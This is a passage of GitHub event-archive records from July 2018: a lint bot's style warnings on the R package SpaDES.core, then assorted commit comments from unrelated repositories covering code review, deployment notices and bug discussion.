^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:72:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/moduleMetadata.R#L72) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-05T20:23:21Z"}
{"id":"7925376181","type":"CommitCommentEvent","actor":{"login":"suujia"},"repo":{"name":"bcgsc/orca"},"payload":{"comment":{"id":29613173,"position":null,"line":null,"path":null,"commit_id":"9e201efe8554da4d8d2e73059beca43312bc2a45","created_at":"2018-07-05T20:24:03Z","updated_at":"2018-07-05T20:24:03Z","author_association":"CONTRIBUTOR","body":"removed sailfish, jupyter, nextflow, adam, gatk, stacks, makefile2graph, salmon (because these were removed from orca dockerfile)"}},"created_at":"2018-07-05T20:24:03Z"}
{"id":"7925396308","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29613231,"position":null,"line":null,"path":null,"commit_id":"a794830e3a5b362dc697ceaa022a16fcfc9404de","created_at":"2018-07-05T20:28:34Z","updated_at":"2018-07-05T20:28:34Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-236](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-236).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-236-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-05T20:28:34Z"}
{"id":"7925396517","type":"CommitCommentEvent","actor":{"login":"vineetjohn"},"repo":{"name":"vineetjohn/linguistic-style-transfer"},"payload":{"comment":{"id":29613232,"position":null,"line":null,"path":null,"commit_id":"04beb1d4f3c618aaab85edfd81c8497aa0a6f849","created_at":"2018-07-05T20:28:37Z","updated_at":"2018-07-05T20:28:37Z","author_association":"OWNER","body":"Addresses #56 "}},"created_at":"2018-07-05T20:28:37Z"}
{"id":"7925396574","type":"CommitCommentEvent","actor":{"login":"cameronc137"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29613233,"position":null,"line":null,"path":null,"commit_id":"30ececb25a3bd8525c04607a525006e9ca42bd7c","created_at":"2018-07-05T20:28:38Z","updated_at":"2018-07-05T20:28:38Z","author_association":"CONTRIBUTOR","body":"This commit takes the separate analysis files that were used to fit the moller, inelastic, and elastic output hit radial positions to TF1 functions, and then use those TF1 functions as input to generators that will then shoot new parent particles mimicking the whole upstream propagation to the detector plane."}},"created_at":"2018-07-05T20:28:38Z"}
{"id":"7925398036","type":"CommitCommentEvent","actor":{"login":"Monk909"},"repo":{"name":"bl00w/codewars.com-kata-counting-duplicates"},"payload":{"comment":{"id":29613238,"position":11,"line":11,"path":"src/CountingDuplicates.java","commit_id":"ab89e52a51661c894071a213c03964784f419cd8","created_at":"2018-07-05T20:28:58Z","updated_at":"2018-07-05T20:28:58Z","author_association":"NONE","body":"7 and 9"}},"created_at":"2018-07-05T20:28:58Z"}
{"id":"7925399766","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29613242,"position":25,"line":25,"path":"Homework #3/Person.java","commit_id":"47f5f94ec462c3eb59e7752497040059cdfa42f9","created_at":"2018-07-05T20:29:23Z","updated_at":"2018-07-05T20:29:23Z","author_association":"OWNER","body":"так не добре, бо на наступний рік наша програма вже буде працювати не правильно\r\nКраще вичитувати поточний рік"}},"created_at":"2018-07-05T20:29:23Z"}
{"id":"7925402419","type":"CommitCommentEvent","actor":{"login":"bensku"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29613255,"position":78,"line":78,"path":"src/main/java/ch/njol/skript/effects/EffSendBlockChange.java","commit_id":"ab391c37417bba1d4044d89f957f7351b314acb1","created_at":"2018-07-05T20:30:01Z","updated_at":"2018-07-05T20:30:01Z","author_association":"MEMBER","body":"It is probably going to be 120. Coding conventions TODO. We most definitely won't follow Google's, at least without changes."}},"created_at":"2018-07-05T20:30:01Z"}
{"id":"7925403539","type":"CommitCommentEvent","actor":{"login":"Oldes"},"repo":{"name":"Oldes/Rebol3"},"payload":{"comment":{"id":29613257,"position":null,"line":null,"path":null,"commit_id":"8de02463a3e55438e43dfd94f86c847a5c499de8","created_at":"2018-07-05T20:30:16Z","updated_at":"2018-07-05T20:30:16Z","author_association":"OWNER","body":"This commit fixed: https://github.com/rebol/rebol-issues/issues/1675"}},"created_at":"2018-07-05T20:30:16Z"}
{"id":"7925406056","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29613264,"position":36,"line":36,"path":"Homework3/Person.java","commit_id":"d9e2d45c1f4d3fd04b2a1939fdd5498d9b99dc81","created_at":"2018-07-05T20:30:50Z","updated_at":"2018-07-05T20:30:50Z","author_association":"OWNER","body":"так не добре, тут варто вичитувати поточний рік\r\nІнакше на наступний рік наша програма вже буде не актуальна"}},"created_at":"2018-07-05T20:30:50Z"}
{"id":"7925408809","type":"CommitCommentEvent","actor":{"login":"cameronc137"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29613268,"position":5,"line":22,"path":"src/remollGenericDetector.cc","commit_id":"0968a3cae0084a5ea95ceddcd2831e5e8ae4b50f","created_at":"2018-07-05T20:31:25Z","updated_at":"2018-07-05T20:31:25Z","author_association":"CONTRIBUTOR","body":"Even though this is set to \"true\" it is still not allowing us to register optical photons as hits on sensitive detectors."}},"created_at":"2018-07-05T20:31:25Z"}
{"id":"7925409044","type":"CommitCommentEvent","actor":{"login":"gfwilliams"},"repo":{"name":"espruino/Espruino"},"payload":{"comment":{"id":29613269,"position":null,"line":null,"path":null,"commit_id":"71524e9bc03af33d407543ab92a1106e78ee3f4b","created_at":"2018-07-05T20:31:29Z","updated_at":"2018-07-05T20:31:29Z","author_association":"MEMBER","body":"Shouldn't be many - it just happens when I've been working off a laptop and have forgotten to keep things in sync between that and the desktop"}},"created_at":"2018-07-05T20:31:29Z"}
{"id":"7925409372","type":"CommitCommentEvent","actor":{"login":"bensku"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29613271,"position":60,"line":60,"path":"src/main/java/ch/njol/skript/expressions/ExprIndexes.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-05T20:31:33Z","updated_at":"2018-07-05T20:31:33Z","author_association":"MEMBER","body":"Might be possible. In any case, fetching raw value is not really expensive."}},"created_at":"2018-07-05T20:31:33Z"}
{"id":"7925413113","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29613285,"position":33,"line":33,"path":"Homework_3/Person.java","commit_id":"4716d067cbaaf47063e6d19ee938835676f285bd","created_at":"2018-07-05T20:32:21Z","updated_at":"2018-07-05T20:32:21Z","author_association":"OWNER","body":"Цей клас вже не рекомендують використовувати, подивись до класу LocalDate"}},"created_at":"2018-07-05T20:32:21Z"}
{"id":"7925413151","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/gonavis-franchising"},"payload":{"comment":{"id":29613286,"position":null,"line":null,"path":null,"commit_id":"8941f007f1753a0a9ebe8d67478e4b103986741d","created_at":"2018-07-05T20:32:21Z","updated_at":"2018-07-05T20:32:21Z","author_association":"COLLABORATOR","body":"Created multidev environment [gonavis-franchising#ci-107](https://dashboard.pantheon.io/sites/bd2040d9-444e-4c2e-ad13-fd575701973a#ci-107).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-107-gonavis-franchising.pantheonsite.io/)"}},"created_at":"2018-07-05T20:32:21Z"}
{"id":"7925413473","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/pakmail-franchising"},"payload":{"comment":{"id":29613288,"position":null,"line":null,"path":null,"commit_id":"3859807bbb393d2b586f16b480d596cb76cdb3d1","created_at":"2018-07-05T20:32:25Z","updated_at":"2018-07-05T20:32:25Z","author_association":"COLLABORATOR","body":"Created multidev environment [pakmail-franchising#ci-54](https://dashboard.pantheon.io/sites/8a4447b4-69fe-419a-b0ba-20c6317d8b0c#ci-54).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-54-pakmail-franchising.pantheonsite.io/)"}},"created_at":"2018-07-05T20:32:25Z"}
{"id":"7925417485","type":"CommitCommentEvent","actor":{"login":"cameronc137"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29613298,"position":82,"line":82,"path":"geometry/detector_cathode.gdml","commit_id":"0968a3cae0084a5ea95ceddcd2831e5e8ae4b50f","created_at":"2018-07-05T20:33:21Z","updated_at":"2018-07-05T20:33:21Z","author_association":"CONTRIBUTOR","body":"We added a new sensitive detector, and kept it as a \"planeDet\" and still saw no optical photon hits register, and we used the \"opticalphoton\" that shows up in some of the pion geometry cases, but it doesn't work either."}},"created_at":"2018-07-05T20:33:21Z"}
{"id":"7925417690","type":"CommitCommentEvent","actor":{"login":"tomkau"},"repo":{"name":"MicrosoftDocs/office-docs-powershell"},"payload":{"comment":{"id":29613299,"position":null,"line":null,"path":null,"commit_id":"9cbac5770bbc02b0bb9ab7b863083be73c2c1de5","created_at":"2018-07-05T20:33:24Z","updated_at":"2018-07-05T20:33:24Z","author_association":"MEMBER","body":"Looks good.  And the same comment can be added to the other CsCallerIdPolicy cmdlets."}},"created_at":"2018-07-05T20:33:24Z"}
{"id":"7925418421","type":"CommitCommentEvent","actor":{"login":"Wphelp98737"},"repo":{"name":"Wphelp98737/didactic-enigma"},"payload":{"comment":{"id":29613300,"position":50,"line":50,"path":"LICENSE","commit_id":"8f020f36cbf39eba9e31c8fb6d025a18efe79936","created_at":"2018-07-05T20:33:31Z","updated_at":"2018-07-05T20:33:31Z","author_association":"OWNER","body":"didactic-enigma "}},"created_at":"2018-07-05T20:33:31Z"}
{"id":"7925419009","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29613302,"position":33,"line":33,"path":"week_two/Persons.java","commit_id":"356b7cfa220f95df8b6f2232974ded35a7438537","created_at":"2018-07-05T20:33:41Z","updated_at":"2018-07-05T20:33:41Z","author_association":"OWNER","body":"тут не добре створювати цей об'єкт\r\nКраще, щоб він був один на всю програму"}},"created_at":"2018-07-05T20:33:41Z"}
{"id":"7925422503","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29613315,"position":40,"line":40,"path":"week_two/Persons.java","commit_id":"356b7cfa220f95df8b6f2232974ded35a7438537","created_at":"2018-07-05T20:34:27Z","updated_at":"2018-07-05T20:34:27Z","author_association":"OWNER","body":"подивись до класу LocalDate і як там вичитати поточну дату, о інакше на наступний рік наша програма вже буде не актуальна"}},"created_at":"2018-07-05T20:34:27Z"}
{"id":"7925422605","type":"CommitCommentEvent","actor":{"login":"bensku"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29613316,"position":80,"line":80,"path":"src/main/java/ch/njol/skript/expressions/ExprIndexes.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-05T20:34:28Z","updated_at":"2018-07-05T20:34:28Z","author_association":"MEMBER","body":"Using String.format is not needed if all additions are to end or start of the string. Otherwise, they are indeed more readable.\r\n\r\nAlso please check how String.format actually works internally. You'll be surprised how much work it takes to merge a few strings together that way."}},"created_at":"2018-07-05T20:34:28Z"}
{"id":"7925425137","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29613319,"position":null,"line":null,"path":null,"commit_id":"bf13b889e7a41e19db34accd0c601a91bdb58629","created_at":"2018-07-05T20:35:05Z","updated_at":"2018-07-05T20:35:05Z","author_association":"COLLABORATOR","body":"Puzzle `302-bdb9bbef` disappeared from [`templates/catalog/category_products.html`](https://github.com/fidals/shopelectro/blob/master/templates/catalog/category_products.html), that's why I closed #340. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-05T20:35:05Z"}
